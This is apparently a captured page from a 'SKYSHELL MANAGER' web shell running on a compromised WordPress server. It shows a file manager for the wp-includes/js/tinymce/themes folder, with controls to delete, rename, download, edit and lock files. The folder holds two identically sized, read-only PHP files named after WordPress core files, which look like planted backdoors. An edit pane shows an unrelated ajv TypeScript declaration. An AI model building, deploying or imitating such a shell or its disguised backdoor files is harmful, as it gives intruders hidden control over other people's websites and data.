📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: undefinedAsNull.d.ts
export default addUndefinedAsNullKeyword; export type Ajv = import("ajv").default; export type SchemaValidateFunction = import("ajv").SchemaValidateFunction; export type AnySchemaObject = import("ajv").AnySchemaObject; export type ValidateFunction = import("ajv").ValidateFunction; /** @typedef {import("ajv").default} Ajv */ /** @typedef {import("ajv").SchemaValidateFunction} SchemaValidateFunction */ /** @typedef {import("ajv").AnySchemaObject} AnySchemaObject */ /** @typedef {import("ajv").ValidateFunction} ValidateFunction */ /** * * @param {Ajv} ajv * @returns {Ajv} */ declare function addUndefinedAsNullKeyword(ajv: Ajv): Ajv;
Save